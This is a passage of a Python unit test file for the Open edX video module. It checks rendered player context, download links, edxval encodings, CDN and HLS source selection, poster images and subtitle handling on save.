'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})
def get_handler_url(self, handler, suffix):
"""
Return the URL for the specified handler on the block represented by
self.item_descriptor.
"""
return self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, handler, suffix
).rstrip('/?')
def test_get_html_track(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="{sub}" download_track="{download_track}"
start_time="01:00:03" end_time="01:00:10" download_video="true"
>
<source src="example.mp4"/>
<source src="example.webm"/>
{track}
{transcripts}
</video>
"""
cases = [
{
'download_track': u'true',
'track': u'<track src="http://www.example.com/track"/>',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': u'http://www.example.com/track',
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': u'a_sub_file.srt.sjson',
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'',
'expected_track_url': None,
'transcripts': '',
},
{
'download_track': u'false',
'track': u'<track src="http://www.example.com/track"/>',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': None,
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'',
'expected_track_url': u'a_sub_file.srt.sjson',
'transcripts': '<transcript language="uk" src="ukrainian.srt" />',
},
]
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': '',
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
for data in cases:
metadata = self.default_metadata_dict
metadata['sources'] = sources
metadata['duration'] = None
DATA = SOURCE_XML.format(
download_track=data['download_track'],
track=data['track'],
sub=data['sub'],
transcripts=data['transcripts'],
)
self.initialize_module(data=DATA)
track_url = self.get_handler_url('transcript', 'download')
context = self.item_descriptor.render(STUDENT_VIEW).content
metadata.update({
'transcriptLanguages': {"en": "English"} if not data['transcripts'] else {"uk": u'Українська'},
'transcriptLanguage': u'en' if not data['transcripts'] or data.get('sub') else u'uk',
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
})
expected_context.update({
'transcript_download_format': (
None if self.item_descriptor.track and self.item_descriptor.download_track else u'srt'
),
'track': (
track_url if data['expected_track_url'] == u'a_sub_file.srt.sjson' else data['expected_track_url']
),
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(metadata)
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
def test_get_html_source(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
>
{sources}
</video>
"""
cases = [
# self.download_video == True
{
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [u'example.mp4', u'example.webm'],
},
},
{
'download_video': 'true',
'source': '',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'download_video_link': u'example.mp4',
'sources': [u'example.mp4', u'example.webm'],
},
},
{
'download_video': 'true',
'source': '',
'sources': [],
'result': {},
},
# self.download_video == False
{
'download_video': 'false',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'sources': [u'example.mp4', u'example.webm'],
},
},
]
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': self.default_metadata_dict,
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
initial_context['metadata']['duration'] = None
for data in cases:
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources']
)
self.initialize_module(data=DATA)
context = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result'].get('sources', []),
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result'].get('download_video_link'),
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_non_existent_edx_video_id(self):
"""
Tests the VideoModule get_html where a edx_video_id is given but a video is not found
"""
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
no_video_data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "meow",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [u'example.mp4', u'example.webm'],
}
}
DATA = SOURCE_XML.format(
download_video=no_video_data['download_video'],
source=no_video_data['source'],
sources=no_video_data['sources'],
edx_video_id=no_video_data['edx_video_id']
)
self.initialize_module(data=DATA)
# Referencing a non-existent VAL ID in courseware won't cause an error --
# it'll just fall back to the values in the VideoDescriptor.
self.assertIn("example_source.mp4", self.item_descriptor.render(STUDENT_VIEW).content)
def test_get_html_with_mocked_edx_video_id(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
data = {
# test with download_video set to false and make sure download_video_link is not set (is None)
'download_video': 'false',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "mock item",
'result': {
'download_video_link': None,
# make sure the desktop_mp4 url is included as part of the alternative sources.
'sources': [u'example.mp4', u'example.webm', u'http://www.meowmix.com'],
}
}
# Video found for edx_video_id
metadata = self.default_metadata_dict
metadata['autoplay'] = False
metadata['sources'] = ""
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
'metadata': metadata
}
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id']
)
self.initialize_module(data=DATA)
with patch('edxval.api.get_video_info') as mock_get_video_info:
mock_get_video_info.return_value = {
'url': '/edxval/video/example',
'edx_video_id': u'example',
'duration': 111.0,
'client_video_id': u'The example video',
'encoded_videos': [
{
'url': u'http://www.meowmix.com',
'file_size': 25556,
'bitrate': 9600,
'profile': u'desktop_mp4'
}
]
}
context = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result']['sources'],
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result']['download_video_link'],
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_existing_edx_video_id(self):
"""
Tests the `VideoModule` `get_html` where `edx_video_id` is given and a related video is found
"""
edx_video_id = 'thundercats'
# create video with provided edx_video_id and return encoded_videos
encoded_videos = self.encode_and_create_video(edx_video_id)
# data to be used to retrieve video by edxval API
data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': edx_video_id,
'result': {
'download_video_link': u'http://fake-video.edx.org/{}.mp4'.format(edx_video_id),
'sources': [u'example.mp4', u'example.webm'] + [video['url'] for video in encoded_videos],
},
}
# context returned by get_html when provided with above data
# expected_context, a dict to assert with context
context, expected_context = self.helper_get_html_with_edx_video_id(data)
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_existing_unstripped_edx_video_id(self):
"""
Tests the `VideoModule` `get_html` where an `edx_video_id` containing an
unwanted tab (\t) is given and a related video is found
"""
edx_video_id = 'thundercats'
# create video with provided edx_video_id and return encoded_videos
encoded_videos = self.encode_and_create_video(edx_video_id)
# data to be used to retrieve video by edxval API
# unstripped edx_video_id is provided here
data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "{}\t".format(edx_video_id),
'result': {
'download_video_link': u'http://fake-video.edx.org/{}.mp4'.format(edx_video_id),
'sources': [u'example.mp4', u'example.webm'] + [video['url'] for video in encoded_videos],
},
}
# context returned by get_html when provided with above data
# expected_context, a dict to assert with context
context, expected_context = self.helper_get_html_with_edx_video_id(data)
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def encode_and_create_video(self, edx_video_id):
"""
Create and encode video to be used for tests
"""
encoded_videos = []
for profile, extension in [("desktop_webm", "webm"), ("desktop_mp4", "mp4")]:
create_profile(profile)
encoded_videos.append(
dict(
url=u"http://fake-video.edx.org/{}.{}".format(edx_video_id, extension),
file_size=9000,
bitrate=42,
profile=profile,
)
)
result = create_video(
dict(
client_video_id='A Client Video id',
duration=111.0,
edx_video_id=edx_video_id,
status='test',
encoded_videos=encoded_videos,
)
)
self.assertEqual(result, edx_video_id)
return encoded_videos
def helper_get_html_with_edx_video_id(self, data):
"""
Create expected context and get actual context returned by `get_html` method.
"""
# make sure the urls for the various encodings are included as part of the alternative sources.
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
# Video found for edx_video_id
metadata = self.default_metadata_dict
metadata['sources'] = ""
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
'metadata': metadata,
}
# pylint: disable=invalid-name
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id']
)
self.initialize_module(data=DATA)
# context returned by get_html
context = self.item_descriptor.render(STUDENT_VIEW).content
# expected_context, expected context to be returned by get_html
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result']['sources'],
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result']['download_video_link'],
'metadata': json.dumps(expected_context['metadata'])
})
return context, expected_context
# pylint: disable=invalid-name
@patch('xmodule.video_module.video_module.BrandingInfoConfig')
@patch('xmodule.video_module.video_module.rewrite_video_url')
def test_get_html_cdn_source(self, mocked_get_video, mock_BrandingInfoConfig):
"""
Test if sources got from CDN
"""
mock_BrandingInfoConfig.get_config.return_value = {
"CN": {
'url': 'http://www.xuetangx.com',
'logo_src': 'http://www.xuetangx.com/static/images/logo.png',
'logo_tag': 'Video hosted by XuetangX.com'
}
}
def side_effect(*args, **kwargs):
cdn = {
'http://example.com/example.mp4': 'http://cdn-example.com/example.mp4',
'http://example.com/example.webm': 'http://cdn-example.com/example.webm',
}
return cdn.get(args[1])
mocked_get_video.side_effect = side_effect
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
edx_video_id="{edx_video_id}"
start_time="01:00:03" end_time="01:00:10"
>
{sources}
</video>
"""
case_data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="http://example.com/example.mp4"/>
<source src="http://example.com/example.webm"/>
""",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [
u'http://cdn-example.com/example.mp4',
u'http://cdn-example.com/example.webm'
],
},
}
# test with and without edx_video_id specified.
cases = [
dict(case_data, edx_video_id=""),
dict(case_data, edx_video_id="vid-v1:12345"),
]
initial_context = {
'autoadvance_enabled': False,
'branding_info': {
'logo_src': 'http://www.xuetangx.com/static/images/logo.png',
'logo_tag': 'Video hosted by XuetangX.com',
'url': 'http://www.xuetangx.com'
},
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': None,
'handout': None,
'id': None,
'metadata': self.default_metadata_dict,
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
initial_context['metadata']['duration'] = None
for data in cases:
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id'],
)
self.initialize_module(data=DATA)
self.item_descriptor.xmodule_runtime.user_location = 'CN'
context = self.item_descriptor.render('student_view').content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result'].get('sources', []),
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result'].get('download_video_link'),
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
@ddt.data(
(True, ['youtube', 'desktop_webm', 'desktop_mp4', 'hls']),
(False, ['youtube', 'desktop_webm', 'desktop_mp4'])
)
@ddt.unpack
def test_get_html_on_toggling_hls_feature(self, hls_feature_enabled, expected_val_profiles):
"""
Verify val profiles on toggling HLS Playback feature.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = {
'desktop_webm': 'https://webm.com/dw.webm',
'hls': 'https://hls.com/hls.m3u8',
'youtube': 'https://yt.com/?v=v0TFmdO4ZP0',
'desktop_mp4': 'https://mp4.com/dm.mp4'
}
with patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled') as feature_enabled:
feature_enabled.return_value = hls_feature_enabled
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
self.initialize_module(data=video_xml)
self.item_descriptor.render(STUDENT_VIEW)
get_urls_for_profiles.assert_called_with(
self.item_descriptor.edx_video_id,
expected_val_profiles,
)
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
@patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles')
def test_get_html_hls(self, get_urls_for_profiles):
"""
Verify that hls profile functionality works as expected.
* HLS source should be added into list of available sources
* HLS source should not be used for download URL If available from edxval
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
get_urls_for_profiles.return_value = {
'desktop_webm': 'https://webm.com/dw.webm',
'hls': 'https://hls.com/hls.m3u8',
'youtube': 'https://yt.com/?v=v0TFmdO4ZP0',
'desktop_mp4': 'https://mp4.com/dm.mp4'
}
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("'download_video_link': 'https://mp4.com/dm.mp4'", context)
self.assertIn('"streams": "1.00:https://yt.com/?v=v0TFmdO4ZP0"', context)
self.assertIn(
'"sources": ["https://webm.com/dw.webm", "https://mp4.com/dm.mp4", "https://hls.com/hls.m3u8"]', context
)
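# A minimal sketch of the download-link rule asserted above (illustrative
# only, not the module's actual implementation): prefer a progressive
# rendition and never expose the HLS manifest as the download URL.
#
#   def pick_download_url(profile_urls):
#       for profile in ('desktop_mp4', 'desktop_webm'):
#           if profile_urls.get(profile):
#               return profile_urls[profile]
#       return None  # HLS-only videos get no download link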
def test_get_html_hls_no_video_id(self):
"""
Verify that `download_video_link` is set to None for HLS videos if no video id
"""
video_xml = """
<video display_name="Video" download_video="true" source="https://hls.com/hls.m3u8">
["https://hls.com/hls2.m3u8", "https://hls.com/hls3.m3u8"]
</video>
"""
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("'download_video_link': None", context)
@patch('xmodule.video_module.video_module.edxval_api.get_course_video_image_url')
def test_poster_image(self, get_course_video_image_url):
"""
Verify that poster image functionality works as expected.
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
get_course_video_image_url.return_value = '/media/video-images/poster.png'
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn('"poster": "/media/video-images/poster.png"', context)
@patch('xmodule.video_module.video_module.edxval_api.get_course_video_image_url')
def test_poster_image_without_edx_video_id(self, get_course_video_image_url):
"""
Verify that poster image is set to None and there is no crash when no edx_video_id.
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="null">[]</video>'
get_course_video_image_url.return_value = '/media/video-images/poster.png'
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("\'poster\': \'null\'", context)
@attr(shard=7)
@ddt.ddt
class TestVideoDescriptorInitialization(BaseTestXmodule):
"""
Make sure that module initialization works correctly.
"""
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestVideoDescriptorInitialization, self).setUp()
self.setup_course()
def test_source_not_in_html5sources(self):
metadata = {
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertIn('source', fields)
self.assertEqual(self.item_descriptor.source, 'http://example.org/video.mp4')
self.assertTrue(self.item_descriptor.download_video)
self.assertTrue(self.item_descriptor.source_visible)
def test_source_in_html5sources(self):
metadata = {
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://example.org/video.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertNotIn('source', fields)
self.assertTrue(self.item_descriptor.download_video)
self.assertFalse(self.item_descriptor.source_visible)
def test_download_video_is_explicitly_set(self):
metadata = {
'track': u'http://some_track.srt',
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
'download_video': False,
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertIn('source', fields)
self.assertIn('download_video', fields)
self.assertFalse(self.item_descriptor.download_video)
self.assertTrue(self.item_descriptor.source_visible)
self.assertTrue(self.item_descriptor.download_track)
def test_source_is_empty(self):
metadata = {
'source': '',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertNotIn('source', fields)
self.assertFalse(self.item_descriptor.download_video)
@ddt.data(
(
{
'youtube': 'v0TFmdO4ZP0',
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=v0TFmdO4ZP0']
),
(
{
'youtube': None,
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=3_yD_cEKoCk']
),
(
{
'youtube': None,
'hls': None,
'desktop_mp4': None,
'desktop_webm': None,
},
['https://www.youtube.com/watch?v=3_yD_cEKoCk']
),
)
@ddt.unpack
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
def test_val_encoding_in_context(self, val_video_encodings, video_url):
"""
Tests that the val encodings correctly override the video url when the edx video id is set and
one or more encodings are present.
Accepted order of source priority is:
VAL's youtube source > external youtube source > hls > mp4 > webm.
Note that `https://www.youtube.com/watch?v=3_yD_cEKoCk` is the default youtube source with which
a video component is initialized. Current implementation considers this youtube source as a valid
external youtube source.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = val_video_encodings
self.initialize_module(
data='<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
)
context = self.item_descriptor.get_context()
self.assertEqual(context['transcripts_basic_tab_metadata']['video_url']['value'], video_url)
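# A minimal sketch of the priority rule exercised above (illustrative only,
# not the module's actual implementation):
#
#   def pick_video_url(val_urls, external_youtube_id):
#       if val_urls.get('youtube'):
#           return 'https://www.youtube.com/watch?v=' + val_urls['youtube']
#       if external_youtube_id:
#           return 'https://www.youtube.com/watch?v=' + external_youtube_id
#       for profile in ('hls', 'desktop_mp4', 'desktop_webm'):
#           if val_urls.get(profile):
#               return val_urls[profile]
#       return None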
@ddt.data(
(
{
'youtube': None,
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://hls.com/hls.m3u8']
),
(
{
'youtube': 'v0TFmdO4ZP0',
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': None,
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=v0TFmdO4ZP0']
),
)
@ddt.unpack
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
def test_val_encoding_in_context_without_external_youtube_source(self, val_video_encodings, video_url):
"""
Tests that the val encodings correctly override the video url when the edx video id is set and
one or more encodings are present. In this scenario, no external youtube source is provided.
Accepted order of source priority is:
VAL's youtube source > external youtube source > hls > mp4 > webm.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = val_video_encodings
self.initialize_module(
data='<video display_name="Video" youtube_id_1_0="" download_video="true" edx_video_id="12345-67890">[]</video>'
)
context = self.item_descriptor.get_context()
self.assertEqual(context['transcripts_basic_tab_metadata']['video_url']['value'], video_url)
@attr(shard=7)
@ddt.ddt
class TestEditorSavedMethod(BaseTestXmodule):
"""
Make sure that `editor_saved` method works correctly.
"""
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestEditorSavedMethod, self).setUp()
self.setup_course()
self.metadata = {
'source': 'http://youtu.be/3_yD_cEKoCk',
'html5_sources': ['http://example.org/video.mp4'],
}
# path to subs_3_yD_cEKoCk.srt.sjson file
self.file_name = 'subs_3_yD_cEKoCk.srt.sjson'
# pylint: disable=no-value-for-parameter
self.test_dir = path(__file__).abspath().dirname().dirname().dirname().dirname().dirname()
self.file_path = self.test_dir + '/common/test/data/uploads/' + self.file_name
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_when_html5_sub_not_exist(self, default_store):
"""
When a youtube sub exists but no html5 sub is present for
html5_sources, the editor_saved function will generate a new
html5 sub for the video.
"""
self.MODULESTORE = MODULESTORES[default_store] # pylint: disable=invalid-name
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
with open(self.file_path, "r") as myfile:
save_to_store(myfile.read(), self.file_name, 'text/sjson', item.location)
item.sub = "3_yD_cEKoCk"
# subs_video.srt.sjson does not exist before calling editor_saved function
with self.assertRaises(NotFoundError):
Transcript.get_asset(item.location, 'subs_video.srt.sjson')
old_metadata = own_metadata(item)
# calling editor_saved will generate new file subs_video.srt.sjson for html5_sources
item.editor_saved(self.user, old_metadata, None)
self.assertIsInstance(Transcript.get_asset(item.location, 'subs_3_yD_cEKoCk.srt.sjson'), StaticContent)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_when_youtube_and_html5_subs_exist(self, default_store):
"""
When both the youtube sub and the html5 sub already exist, no new
sub will be generated by the editor_saved function.
"""
self.MODULESTORE = MODULESTORES[default_store]
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
with open(self.file_path, "r") as myfile:
save_to_store(myfile.read(), self.file_name, 'text/sjson', item.location)
save_to_store(myfile.read(), 'subs_video.srt.sjson', 'text/sjson', item.location)
item.sub = "3_yD_cEKoCk"
# subs_3_yD_cEKoCk.srt.sjson and subs_video.srt.sjson already exist
self.assertIsInstance(Transcript.get_asset(item.location, self.file_name), StaticContent)
self.assertIsInstance(Transcript.get_asset(item.location, 'subs_video.srt.sjson'), StaticContent)
old_metadata = own_metadata(item)
with patch('xmodule.video_module.video_module.manage_video_subtitles_save') as manage_video_subtitles_save:
item.editor_saved(self.user, old_metadata, None)
self.assertFalse(manage_video_subtitles_save.called)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_with_unstripped_video_id(self, default_store):
"""
Verify that editor_saved strips the video id when it contains spaces/tabs.
"""
self.MODULESTORE = MODULESTORES[default_store]
stripped_video_id = unicode(uuid4())
unstripped_video_id = u'{video_id}{tabs}'.format(video_id=stripped_video_id, tabs=u'\t\t\t')
self.metadata.update({
'edx_video_id': unstripped_video_id
})
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
self.assertEqual(item.edx_video_id, unstripped_video_id)
# Now, modifying and saving the video module should strip the video id.
old_metadata = own_metadata(item)
item.display_name = u'New display name'
item.editor_saved(self.user, old_metadata, None)
self.assertEqual(item.edx_video_id, stripped_video_id)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
@patch('xmodule.video_module.video_module.edxval_api.get_url_for_profile', Mock(return_value='test_yt_id'))
def test_editor_saved_with_yt_val_profile(self, default_store):
"""
Verify that editor_saved overrides `youtube_id_1_0` when a youtube val
profile exists for the given `edx_video_id`.
"""
self.MODULESTORE = MODULESTORES[default_store]
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
self.assertEqual(item.youtube_id_1_0, '3_yD_cEKoCk')
# Now, modify `edx_video_id` and save should override `youtube_id_1_0`.
old_metadata = own_metadata(item)
item.edx_video_id = unicode(uuid4())
item.editor_saved(self.user, old_metadata, None)
self.assertEqual(item.youtube_id_1_0, 'test_yt_id')
@ddt.ddt
class TestVideoDescriptorStudentViewJson(TestCase):
"""
Tests for the student_view_data method on VideoDescriptor.
"""
TEST_DURATION = 111.0
TEST_PROFILE = "mobile"
TEST_SOURCE_URL = "http://www.example.com/source.mp4"
TEST_LANGUAGE = "ge"
TEST_ENCODED_VIDEO = {
'profile': TEST_PROFILE,
'bitrate': 333,
'url': 'http://example.com/video',
'file_size': 222,
}
TEST_EDX_VIDEO_ID = 'test_edx_video_id'
TEST_YOUTUBE_ID = 'test_youtube_id'
TEST_YOUTUBE_EXPECTED_URL = 'https://www.youtube.com/watch?v=test_youtube_id'
def setUp(self):
super(TestVideoDescriptorStudentViewJson, self).setUp()
video_declaration = (
"<video display_name='Test Video' edx_video_id='123' youtube_id_1_0=\'" + self.TEST_YOUTUBE_ID + "\'>"
)
sample_xml = ''.join([
